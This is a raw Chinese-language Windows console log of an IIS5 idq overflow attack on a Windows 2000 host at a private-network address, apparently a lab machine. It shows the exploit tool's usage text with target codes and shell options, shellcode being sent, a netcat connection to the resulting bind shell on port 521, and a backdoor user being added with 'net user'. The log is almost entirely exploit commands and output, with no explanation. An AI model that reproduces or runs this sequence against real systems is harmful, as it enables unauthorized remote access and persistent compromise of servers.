(C) 版權所有 1985-2003 Microsoft Corp.
驅動器 D 中的卷沒有標籤。
卷的序列號是 C461-74A9
2011-05-03 08:46 <DIR> ..
2001-07-24 13:34 16,384 IISIDQOverflowV2_Build0013.exe
2001-07-24 13:34 24,576 IISMiscOverflowV2_Build0013.exe
2001-07-24 13:37 1,281 ReadmeNow.txt
2001-09-23 09:56 506 ReadmNow.txt
4 個文件 42,747 字節
2 個目錄 8,274,116,608 可用字節
'iisidq' 不是內部或外部命令,也不是可運行的程序
或批處理文件。
運行參數: 操作系統類型 目的地址 web端口 1 溢出監聽端口 <輸入命令1>
或者: 操作系統類型 目的地址 web端口 2 溢出連接IP 溢出連接端口 <輸入命令1>
其中,如果輸入命令參數沒有輸入,那麼,默認爲:"cmd.exe /c + dir"
如果爲1,那麼,將輸入新的命令.
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --IIS5 Japanese Win2k Sp2
9 -- IIS5 Mexico Win2k
10 -- --IIS5 Mexico Win2k sp1
11 -- --IIS5 Mexico Win2k sp2
http://snake12.top263.net 2000/07
'iisidq' 不是內部或外部命令,也不是可運行的程序
或批處理文件。
連接目的機器 192.168.191.128:80 OK.
發送shellcode 到 192.168.191.128:80 OK
現在,如果系統類型正確,並且漏洞存在,那麼,應該 可以得到 [cmd.exe /c dir c:\] 結
果了...,good luck.!
D:\IISidq>cd..
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
驅動器 C 中的卷沒有標籤。
卷的序列號是 64FE-4AEE
2010-09-14 10:29 <DIR> Inetpub
2011-05-03 08:29 <DIR> Program Files
2011-05-03 08:33 <DIR> web
2011-05-03 08:42 <DIR> WINDOWS
0 個文件 0 字節
5 個目錄 6,867,349,504 可用字節
D:\>dir
驅動器 D 中的卷沒有標籤。
卷的序列號是 C461-74A9
2011-04-11 15:54 1,549 8uftp.xml
2011-04-14 16:23 <DIR> backup
2011-04-15 08:46 <DIR> data
2011-04-21 09:20 <DIR> fakeTasks.{D6277990-4C6A-11CF-8D87-00AA0060F
5BF}
2011-05-03 08:46 <DIR> IISidq
2011-04-21 08:37 1,120 maxiangrui.rar
1996-07-26 08:39 45,568 nc.exe
2011-04-14 16:46 <DIR> Program Files
2011-04-14 16:45 34,235,768 QQ2010.exe
2011-04-21 09:20 <DIR> set.{21EC2020-3AEA-1069-A2DD-08002B30309D}
2011-04-20 08:29 <DIR> sql
2011-03-27 10:32 <DIR> vfp
2011-03-30 09:39 <DIR> wy
2011-04-14 16:24 <DIR> _user
2009-12-31 00:00 7,981,995 客戶端模擬練習版.exe
2011-04-12 08:21 <DIR> 聊天衝浪
6 個文件 43,373,800 字節
11 個目錄 8,274,067,456 可用字節
系統找不到指定的路徑。
'iisidq' 不是內部或外部命令,也不是可運行的程序
或批處理文件。
連接目的機器 192.168191.128:80 失敗.
連接目的機器 192.168.191.128:80 OK.
發送shellcode 到 192.168.191.128:80 OK
現在,如果系統類型正確,並且漏洞存在,那麼,應該 可以得到 [cmd.exe] 結果了...,good
luck.!
D:\IISidq>nc -v 192.168.191.128 521
'nc' 不是內部或外部命令,也不是可運行的程序
或批處理文件。
punt!: unknown socket error
no port[s] to connect to
D:\>cd..
D:\>
D:\>
D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-1998 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>net user maxr maxr123 /add
net user maxr maxr123 /add
命令成功完成。
cd..
cd..
dir
驅動器 C 中的卷沒有標籤。
卷的序列號是 64FE-4AEE
2010-09-14 10:29 <DIR> Inetpub
2011-05-03 08:29 <DIR> Program Files
2011-05-03 08:33 <DIR> web
2011-05-03 08:42 <DIR> WINDOWS
0 個文件 0 字節
5 個目錄 6,867,341,312 可用字節
cd web